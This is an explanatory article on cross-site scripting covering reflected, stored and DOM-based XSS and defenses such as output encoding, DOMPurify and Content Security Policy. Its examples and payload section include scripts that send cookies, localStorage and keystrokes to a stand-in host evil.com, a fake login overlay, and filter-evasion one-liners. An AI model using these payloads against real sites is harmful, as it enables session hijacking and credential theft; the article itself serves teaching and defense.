Cross-Site Scripting (Web Security)

Introduction

Cross-Site Scripting (XSS) is a class of injection vulnerability in which an attacker inserts malicious client-side scripts into web pages viewed by other users. When a victim's browser renders the compromised page, the injected script executes with the same privileges as legitimate scripts from that origin, giving the attacker access to cookies, session tokens, and the full DOM of the page.

XSS has consistently ranked among the top web application vulnerabilities since OWASP began publishing its Top Ten list in 2003. Despite being well understood for over two decades, XSS remains pervasive because it can appear anywhere user-controlled data is reflected in a page without adequate encoding or sanitization.

The name "Cross-Site Scripting" originates from the original attack model, where a malicious site would inject script into a different (trusted) site. Though the name is somewhat misleading today -- most XSS attacks do not literally cross between sites -- the term persists as the standard designation for this vulnerability class.

"XSS is the new buffer overflow, JavaScript is the new shell code." -- Jeremiah Grossman, founder of WhiteHat Security, on the prevalence and impact of XSS in modern web applications

How XSS Works

At its core, every XSS attack follows the same pattern: untrusted data enters a web application through a user-controllable input, and that data is subsequently included in dynamic content sent to another user's browser without proper validation, encoding, or escaping. The browser has no way to distinguish between the legitimate scripts authored by the developer and the malicious scripts injected by the attacker -- both execute with the full authority of the page's origin.

The consequences of successful XSS exploitation include:

Session hijacking: Stealing session cookies to impersonate the victim. See Session Hijacking for details.
Credential theft: Injecting fake login forms or keyloggers to capture usernames and passwords.
Defacement: Modifying the visible content of the page to display false or malicious information.
Malware distribution: Redirecting users to malicious sites or triggering drive-by downloads.
Cryptojacking: Using the victim's browser to mine cryptocurrency.
CSRF bypass: Using XSS to read anti-CSRF tokens and forge authenticated requests.

XSS Type	Payload Location	Persistence	Server Involvement	Typical Impact
Reflected	URL parameter or form input	Non-persistent	Server reflects input in response	Single user per crafted link
Stored	Database, file, or message	Persistent	Server stores and serves payload	All users who view content
DOM-Based	Client-side JavaScript	Non-persistent	Server may not be involved	Single user per crafted link

Reflected XSS

Reflected XSS (also called non-persistent XSS) occurs when user input is immediately returned by the server in the HTTP response without proper encoding. The malicious script is not stored on the server; instead, it is embedded in a URL or form submission that the victim must be tricked into clicking or submitting.

A typical reflected XSS scenario involves a search page that displays the user's query in the results. If the server inserts the query directly into the HTML without encoding, an attacker can craft a URL containing a script payload.

    <!-- Vulnerable server-side code (PHP example) -->
    <p>You searched for: <?php echo $_GET['q']; ?></p>

    <!-- Attacker crafts this URL: -->
    https://example.com/search?q=<script>document.location='https://evil.com/steal?c='+document.cookie</script>

    <!-- The browser renders: -->
    <p>You searched for: <script>document.location='https://evil.com/steal?c='+document.cookie</script></p>

The attacker distributes the malicious URL through phishing emails, social media posts, or advertisements. When the victim clicks the link, their browser sends the request to the legitimate server, which reflects the payload back in the response. The victim's browser then executes the script because it appears to originate from the trusted domain.

Reflected XSS is the most common form of XSS but generally requires social engineering to exploit, since each victim must individually click a crafted link. Older browsers shipped built-in XSS filters (for example, Chrome's XSS Auditor), but these were easy to bypass and have since been removed from the major browsers, so they cannot be relied upon as a defense.
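The reflected flow described in this section can be sketched in JavaScript without a web framework. This is a minimal illustration under stated assumptions: escapeHtml, renderSearchVulnerable, and renderSearchEncoded are hypothetical names, and the functions only build the HTML string that a search handler would return.

```javascript
// Hypothetical helper: HTML-entity-encode the five significant characters.
function escapeHtml(value) {
  return String(value)
    .replace(/&/g, '&amp;')
    .replace(/</g, '&lt;')
    .replace(/>/g, '&gt;')
    .replace(/"/g, '&quot;')
    .replace(/'/g, '&#x27;');
}

// Vulnerable: the query is concatenated into the markup unchanged.
function renderSearchVulnerable(query) {
  return `<p>You searched for: ${query}</p>`;
}

// Safer: the query is encoded for the HTML body context first.
function renderSearchEncoded(query) {
  return `<p>You searched for: ${escapeHtml(query)}</p>`;
}

// Simulate the server decoding the q parameter of a crafted link.
const craftedUrl = new URL(
  'https://example.com/search?q=' +
    encodeURIComponent("<script>alert('XSS')</script>")
);
const query = craftedUrl.searchParams.get('q');

console.log(renderSearchVulnerable(query)); // response contains a script element
console.log(renderSearchEncoded(query));    // payload is rendered as inert text
```

The only difference between the two handlers is the encoding step at the point of output, which is why the defense belongs in the rendering code rather than in the link or the request.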

Stored XSS

Stored XSS (also called persistent XSS) occurs when the malicious payload is permanently saved on the target server -- typically in a database, comment field, forum post, user profile, or any other data store that serves content to other users. Every user who subsequently views the affected content will have the malicious script executed in their browser.

Stored XSS is considered more dangerous than reflected XSS because it does not require social engineering. The attacker injects the payload once, and it automatically affects every user who views the compromised content. A single stored XSS vulnerability in a popular web application can compromise thousands or millions of users.

    <!-- Attacker submits this as a blog comment: -->
    Great article!
    <script>
      fetch('https://evil.com/log', {
        method: 'POST',
        body: JSON.stringify({
          cookies: document.cookie,
          url: window.location.href,
          localStorage: JSON.stringify(localStorage)
        })
      });
    </script>
    <!-- The comment is stored in the database and rendered for every visitor -->
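To make the persistence concrete, the sketch below models the comment store as an in-memory array (an assumption standing in for the database) and renders the same stored comment for several visitors. The names commentStore, submitComment, and renderCommentsFor are hypothetical, and the payload is a harmless placeholder.

```javascript
// In-memory stand-in for the database; a real application would persist this.
const commentStore = [];

// Store the comment exactly as submitted.
function submitComment(author, body) {
  commentStore.push({ author, body });
}

function escapeHtml(value) {
  return String(value)
    .replace(/&/g, '&amp;')
    .replace(/</g, '&lt;')
    .replace(/>/g, '&gt;')
    .replace(/"/g, '&quot;')
    .replace(/'/g, '&#x27;');
}

// Render the comment page for one visitor, optionally encoding at output time.
function renderCommentsFor(visitor, { encode }) {
  const render = encode ? escapeHtml : (value) => String(value);
  const items = commentStore
    .map((c) => `<li>${render(c.author)}: ${render(c.body)}</li>`)
    .join('');
  return `<h1>Comments (viewing as ${escapeHtml(visitor)})</h1><ul>${items}</ul>`;
}

// The attacker submits once...
submitComment('mallory', 'Great article! <script>/* payload */</script>');

// ...and every later visitor receives the payload unless output is encoded.
const visitors = ['alice', 'bob', 'carol'];
const exposed = visitors.filter((v) =>
  renderCommentsFor(v, { encode: false }).includes('<script>')
);
const exposedWhenEncoded = visitors.filter((v) =>
  renderCommentsFor(v, { encode: true }).includes('<script>')
);

console.log(exposed.length, exposedWhenEncoded.length); // 3 0
```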

Real-world examples of stored XSS include the Samy worm (2005), which exploited a stored XSS vulnerability in MySpace to propagate a self-replicating payload that added over one million friends to the attacker's profile within 20 hours. The TweetDeck XSS worm (2014) similarly exploited stored XSS in Twitter's client to self-retweet across thousands of accounts.

DOM-Based XSS

DOM-based XSS occurs entirely on the client side. The vulnerability exists in client-side JavaScript that processes data from an attacker-controllable source (such as the URL fragment, document.referrer, or window.name) and passes it to a dangerous sink that supports dynamic code execution (such as innerHTML, eval(), or document.write()).

Unlike reflected and stored XSS, the malicious payload in DOM-based XSS may never be sent to the server. The attack occurs entirely within the browser, making it invisible to server-side security measures such as web application firewalls (WAFs).

    // Vulnerable JavaScript code
    const userInput = document.location.hash.substring(1);
    document.getElementById('greeting').innerHTML = 'Hello, ' + userInput;

    // Attacker crafts URL:
    // https://example.com/page#<img src=x onerror=alert(document.cookie)>

    // The browser processes the fragment client-side
    // The img tag is injected into the DOM and the onerror handler fires

Dangerous Sources	Dangerous Sinks
document.location	element.innerHTML
document.URL	element.outerHTML
document.referrer	document.write()
window.name	eval()
location.hash	setTimeout() / setInterval() with strings
postMessage data	Function() constructor
Web Storage values	jQuery .html() / .append()

To prevent DOM-based XSS, developers must treat all client-side data sources as untrusted. Use textContent instead of innerHTML, avoid eval() and related functions, and apply context-appropriate encoding when inserting dynamic data into the DOM.
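A safer version of the greeting logic might look like the sketch below. It is an illustration, not a drop-in fix: nameFromFragment and renderGreeting are hypothetical names, and a plain object stands in for the DOM element so that the code also runs outside a browser.

```javascript
// Read the name from the URL fragment (an attacker-controllable source).
function nameFromFragment(href) {
  const raw = new URL(href).hash.slice(1);
  try {
    return decodeURIComponent(raw);
  } catch {
    return raw; // malformed percent-encoding: keep the raw text
  }
}

// Safe sink: in a browser, textContent treats its value as text, not markup.
function renderGreeting(element, href) {
  element.textContent = 'Hello, ' + nameFromFragment(href);
}

// Stand-in for document.getElementById('greeting') so the sketch runs in Node.js.
const greeting = { textContent: '' };
renderGreeting(
  greeting,
  'https://example.com/page#<img src=x onerror=alert(1)>'
);

console.log(greeting.textContent); // Hello, <img src=x onerror=alert(1)>
```

In a real page the markup characters would be displayed literally inside the greeting element; no img element is created and no event handler fires.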

Common XSS Payloads

XSS payloads range from simple proof-of-concept alert boxes to sophisticated multi-stage attacks. Understanding common payloads helps security teams assess the real impact of XSS vulnerabilities and test their defenses effectively.

    <!-- Classic proof-of-concept -->
    <script>alert('XSS')</script>

    <!-- Cookie theft -->
    <script>new Image().src='https://evil.com/steal?c='+document.cookie</script>

    <!-- Keylogger injection -->
    <script>
    document.addEventListener('keypress', function(e) {
      fetch('https://evil.com/keys?k=' + e.key);
    });
    </script>

    <!-- Phishing overlay -->
    <div style="position:fixed;top:0;left:0;width:100%;height:100%;background:white;z-index:9999">
      <h2>Session expired. Please log in again.</h2>
      <form action="https://evil.com/phish">
        <input name="user" placeholder="Username">
        <input name="pass" type="password" placeholder="Password">
        <button>Log In</button>
      </form>
    </div>

    <!-- Filter evasion techniques -->
    <img src=x onerror=alert(1)>
    <svg onload=alert(1)>
    <body onload=alert(1)>
    <input onfocus=alert(1) autofocus>
    <marquee onstart=alert(1)>
    <details open ontoggle=alert(1)>

Attackers frequently use encoding tricks to bypass naive input filters. These include HTML entity encoding (&lt;script&gt;), URL encoding (%3Cscript%3E), Unicode encoding, mixed case (<ScRiPt>), and null byte injection. This is why denylist-based filtering is fundamentally insufficient: there are too many encoding variants to block them all.
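The weakness of a denylist can be shown with a deliberately naive filter. The function naiveFilter below is a hypothetical example of the kind of filter that should not be used; it strips the literal lowercase script tags and nothing else.

```javascript
// Naive denylist (do NOT use): remove literal "<script>" and "</script>".
function naiveFilter(input) {
  return input.replace(/<script>/g, '').replace(/<\/script>/g, '');
}

const bypasses = {
  // Case variation is not matched by the case-sensitive pattern.
  mixedCase: '<ScRiPt>alert(1)</ScRiPt>',
  // Event handlers need no script tag at all.
  eventHandler: '<img src=x onerror=alert(1)>',
  // Removing the inner tags reassembles the outer ones.
  nested: '<scr<script>ipt>alert(1)</scr</script>ipt>',
};

for (const [name, payload] of Object.entries(bypasses)) {
  console.log(name, '=>', naiveFilter(payload));
}
```

All three inputs leave the filter as executable markup. The nested case is worth noting because the filter itself constructs the final script tag.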

Output Encoding

Output encoding is the primary defense against XSS. The principle is straightforward: whenever untrusted data is inserted into an HTML page, it must be encoded according to the context in which it appears. This ensures that the data is treated as data, not as executable code.

The critical insight is that different HTML contexts require different encoding rules. Data placed inside an HTML element body requires different encoding than data placed inside a JavaScript string, a URL parameter, or a CSS value.

Context	Example	Encoding Method	Characters Encoded
HTML Body	<p>USER_DATA</p>	HTML entity encoding	& < > " '
HTML Attribute	<input value="USER_DATA">	HTML attribute encoding	All non-alphanumeric characters
JavaScript	var x = 'USER_DATA';	JavaScript hex encoding	All non-alphanumeric characters
URL Parameter	<a href="/page?q=USER_DATA">	URL/percent encoding	All non-alphanumeric characters
CSS	background: USER_DATA;	CSS hex encoding	All non-alphanumeric characters

    // Node.js / Express: using context-appropriate encoding

    // HTML body context -- encode HTML entities
    function encodeHTML(str) {
      return str.replace(/&/g, '&amp;')
                .replace(/</g, '&lt;')
                .replace(/>/g, '&gt;')
                .replace(/"/g, '&quot;')
                .replace(/'/g, '&#x27;');
    }

    // Most template engines auto-encode by default:
    // EJS: <%= userData %> (auto-encoded)
    // EJS: <%- userData %> (raw -- DANGEROUS)
    // Handlebars: {{userData}} (auto-encoded)
    // Handlebars: {{{userData}}} (raw -- DANGEROUS)
    // Jinja2: {{ userData }} (auto-encoded with autoescape=True)
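The encoder above covers only the HTML body row of the table. The other contexts could be sketched as follows; the function names are hypothetical, and the rules are a simplified reading of the table (encode every non-alphanumeric character), not a replacement for a maintained encoding library.

```javascript
// HTML attribute context: encode every non-alphanumeric character as &#xHH;
function encodeForHtmlAttribute(value) {
  return Array.from(String(value), (ch) =>
    /[A-Za-z0-9]/.test(ch) ? ch : `&#x${ch.codePointAt(0).toString(16)};`
  ).join('');
}

// JavaScript string context: encode every non-alphanumeric UTF-16 code unit as \uXXXX
function encodeForJsString(value) {
  return String(value).replace(
    /[^A-Za-z0-9]/g,
    (ch) => '\\u' + ch.charCodeAt(0).toString(16).padStart(4, '0')
  );
}

// URL parameter context: percent-encode with the built-in encodeURIComponent.
// Note that it leaves a few characters such as ' ( ) ! * unescaped, so the
// result should still be placed inside a quoted attribute.
function encodeForUrlParam(value) {
  return encodeURIComponent(String(value));
}

console.log(encodeForHtmlAttribute('" onmouseover="x'));
console.log(encodeForJsString("';alert(1)//"));
console.log(encodeForUrlParam('<script>'));
```

Each encoder is only safe in its own context: a value encoded for a URL parameter and then placed inside a JavaScript string, for example, needs the JavaScript encoding as well.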

"Output encoding is not optional. It is not a nice-to-have. Every single place where untrusted data enters an HTML page is a potential XSS vulnerability if the data is not encoded for the correct context." -- OWASP XSS Prevention Cheat Sheet

Input Sanitization

While output encoding is the primary defense, input sanitization provides a complementary layer of protection, particularly for applications that must accept rich HTML content (such as blog platforms, email clients, or content management systems). Sanitization removes or neutralizes potentially dangerous elements and attributes from HTML input while preserving safe formatting.

The gold standard for HTML sanitization is to use a well-tested library that parses the input into a DOM tree, walks the tree to remove disallowed elements and attributes, and then serializes the clean tree back to HTML. Writing your own HTML sanitizer using regular expressions is extremely error-prone and strongly discouraged.

    // Server-side sanitization with DOMPurify (Node.js)
    const createDOMPurify = require('dompurify');
    const { JSDOM } = require('jsdom');

    const window = new JSDOM('').window;
    const DOMPurify = createDOMPurify(window);

    const dirty = '<p>Hello</p><script>alert("XSS")</script><img src=x onerror=alert(1)>';
    const clean = DOMPurify.sanitize(dirty);
    // Result: '<p>Hello</p><img src="x">'
    // The script tag and onerror handler are removed

    // Allow only specific tags and attributes
    const strictClean = DOMPurify.sanitize(dirty, {
      ALLOWED_TAGS: ['p', 'b', 'i', 'em', 'strong', 'a'],
      ALLOWED_ATTR: ['href']
    });

Key principles of effective sanitization:

Use an allowlist, not a denylist. Define which elements and attributes are permitted rather than trying to block dangerous ones. New attack vectors are discovered regularly, and a denylist will always miss some.
Parse, don't regex. Regular expressions cannot reliably parse HTML. Use a proper HTML parser to build a DOM tree before filtering.
Sanitize on output, not just on input. Data may be transformed between storage and display, potentially reintroducing dangerous content.
Use established libraries. DOMPurify, Bleach (Python, now deprecated by its maintainers), and the OWASP Java HTML Sanitizer have been extensively reviewed by security researchers.
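The allowlist and tree-walking principles can be illustrated on a tree that has already been parsed. The sketch below assumes a hypothetical node shape ({ tag, attrs, children }, with strings as text nodes) produced by a real HTML parser; it shows only the walk and serialize steps and is not a substitute for a library such as DOMPurify.

```javascript
const ALLOWED_TAGS = new Set(['p', 'b', 'i', 'em', 'strong', 'a']);
const ALLOWED_ATTRS = new Set(['href']);
const DROP_WITH_CONTENT = new Set(['script', 'style']);

function escapeHtml(value) {
  return String(value)
    .replace(/&/g, '&amp;')
    .replace(/</g, '&lt;')
    .replace(/>/g, '&gt;')
    .replace(/"/g, '&quot;')
    .replace(/'/g, '&#x27;');
}

// Only permit link targets with an explicitly allowed scheme.
function isSafeHref(value) {
  return /^(https?:|mailto:)/i.test(String(value).trim());
}

// Walk the tree and serialize only allowlisted elements and attributes.
function sanitizeNode(node) {
  if (typeof node === 'string') return escapeHtml(node); // text node
  const tag = String(node.tag).toLowerCase();
  if (DROP_WITH_CONTENT.has(tag)) return '';             // drop element and content
  const children = (node.children || []).map(sanitizeNode).join('');
  if (!ALLOWED_TAGS.has(tag)) return children;           // unwrap: keep text only
  const attrs = Object.entries(node.attrs || {})
    .map(([name, value]) => [name.toLowerCase(), value])
    .filter(([name, value]) =>
      ALLOWED_ATTRS.has(name) && (name !== 'href' || isSafeHref(value)))
    .map(([name, value]) => ` ${name}="${escapeHtml(value)}"`)
    .join('');
  return `<${tag}${attrs}>${children}</${tag}>`;
}

// Hypothetical parsed input containing several dangerous constructs.
const tree = {
  tag: 'p',
  children: [
    'Hello ',
    { tag: 'script', children: ['alert("XSS")'] },
    { tag: 'a', attrs: { href: 'javascript:alert(1)', onclick: 'steal()' }, children: ['a link'] },
    { tag: 'a', attrs: { href: 'https://example.com/' }, children: ['safe'] },
    { tag: 'img', attrs: { src: 'x', onerror: 'alert(1)' } },
  ],
};

console.log(sanitizeNode(tree));
// <p>Hello <a>a link</a><a href="https://example.com/">safe</a></p>
```

Anything not named in the allowlists disappears by default, so a newly discovered dangerous attribute requires no change to the sanitizer.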

Content Security Policy

Content Security Policy (CSP) is a browser security mechanism that provides a second line of defense against XSS. CSP allows a web application to declare which sources of content are legitimate, instructing the browser to block execution of scripts, styles, or other resources that do not match the policy. Even if an attacker successfully injects a script tag into a page, a properly configured CSP can prevent that script from executing.

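CSP is delivered via an HTTP response header or a <meta> tag, although some directives (including frame-ancestors and report-uri) are ignored when the policy is delivered through <meta>. The policy consists of directives that control different resource types.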

    # Strict CSP header example
    Content-Security-Policy:
        default-src 'self';
        script-src 'self' 'nonce-abc123';
        style-src 'self' 'unsafe-inline';
        img-src 'self' data: https:;
        font-src 'self';
        connect-src 'self' https://api.example.com;
        frame-ancestors 'none';
        base-uri 'self';
        form-action 'self';
        report-uri /csp-report;

    # Using nonces (preferred over 'unsafe-inline' for scripts):
    # Server generates a unique nonce per request
    # Only script tags with the matching nonce attribute execute

    <script nonce="abc123">
      // This script executes because the nonce matches
      console.log('Legitimate script');
    </script>

    <script>
      // This injected script is BLOCKED -- no valid nonce
      alert('XSS attempt');
    </script>

A strict nonce-based CSP is the most effective configuration. Each page response includes a cryptographically random nonce value. Only <script> tags bearing the correct nonce attribute are permitted to execute. Since the attacker cannot predict the nonce, injected scripts are blocked even if the XSS payload successfully enters the page.
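Per-request nonce generation might be sketched in Node.js as follows. The function names are hypothetical and the policy is shortened for illustration; the only library call used is crypto.randomBytes from the Node.js standard library.

```javascript
const crypto = require('node:crypto');

// Generate a fresh, unpredictable nonce for one response (128 bits, base64).
function generateNonce() {
  return crypto.randomBytes(16).toString('base64');
}

// Build the header value; only the nonce changes from request to request.
function buildCspHeader(nonce) {
  return [
    "default-src 'self'",
    `script-src 'self' 'nonce-${nonce}'`,
    "base-uri 'self'",
    "frame-ancestors 'none'",
  ].join('; ');
}

// Attach the same nonce to the legitimate inline script in the page body.
function renderPage(nonce) {
  return `<script nonce="${nonce}">console.log('Legitimate script');</script>`;
}

const nonce = generateNonce();
console.log('Content-Security-Policy:', buildCspHeader(nonce));
console.log(renderPage(nonce));
```

The nonce must be regenerated for every response and never reused or cached with the page; a static nonce can be copied by an attacker and offers no protection.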

CSP should be deployed incrementally. Start with Content-Security-Policy-Report-Only to monitor violations without breaking functionality, review reports to identify legitimate resources that need to be allowlisted, and then switch to enforcement mode. CSP is a defense-in-depth measure -- it does not replace output encoding and sanitization but significantly reduces the impact of XSS when those primary defenses fail.
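During the report-only phase, violation reports can be tallied to find legitimate resources that the policy still blocks. The sketch below assumes reports arrive as JSON bodies in the report-uri format (a top-level "csp-report" object); cspHeaderName and summarizeCspReports are hypothetical helpers, and the sample reports are invented for illustration.

```javascript
// Pick the header name for the current rollout phase.
function cspHeaderName(enforce) {
  return enforce
    ? 'Content-Security-Policy'
    : 'Content-Security-Policy-Report-Only';
}

// Count violations per "directive -> blocked URI" pair.
function summarizeCspReports(reportBodies) {
  const counts = new Map();
  for (const body of reportBodies) {
    let report;
    try {
      report = JSON.parse(body)['csp-report'];
    } catch {
      continue; // skip bodies that are not valid report JSON
    }
    if (!report) continue;
    const directive =
      report['effective-directive'] || report['violated-directive'];
    const key = `${directive} -> ${report['blocked-uri']}`;
    counts.set(key, (counts.get(key) || 0) + 1);
  }
  return counts;
}

// Invented sample data: two script violations, one image violation, one bad body.
const scriptReport = JSON.stringify({
  'csp-report': {
    'document-uri': 'https://example.com/',
    'effective-directive': 'script-src',
    'blocked-uri': 'https://cdn.example.net/lib.js',
  },
});
const imageReport = JSON.stringify({
  'csp-report': {
    'document-uri': 'https://example.com/',
    'effective-directive': 'img-src',
    'blocked-uri': 'data',
  },
});
const summary = summarizeCspReports([scriptReport, scriptReport, imageReport, 'not json']);

console.log(cspHeaderName(false));
for (const [key, count] of summary) console.log(count, key);
```

Entries that recur across many ordinary page loads are candidates for allowlisting; one-off entries pointing at unfamiliar hosts are more likely to be injected content or browser extensions.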

References

OWASP Foundation. (2023). OWASP Cross-Site Scripting Prevention Cheat Sheet. OWASP.
OWASP Foundation. (2021). OWASP Top Ten 2021: A03 Injection. OWASP.
Grossman, J. (2007). XSS Attacks: Cross Site Scripting Exploits and Defense. Syngress.
W3C. (2023). Content Security Policy Level 3. W3C Working Draft.
Heiderich, M. et al. (2017). "DOMPurify: Client-Side Protection Against XSS and Markup Injection." European Symposium on Research in Computer Security.
Lekies, S. et al. (2017). "Code-Reuse Attacks for the Web: Breaking Cross-Site Scripting Mitigations via Script Gadgets." ACM Conference on Computer and Communications Security.
Weichselbaum, L. et al. (2016). "CSP Is Dead, Long Live CSP! On the Insecurity of Whitelists and the Future of Content Security Policy." ACM Conference on Computer and Communications Security.
Kamkar, S. (2005). "Technical explanation of the MySpace worm." samy.pl.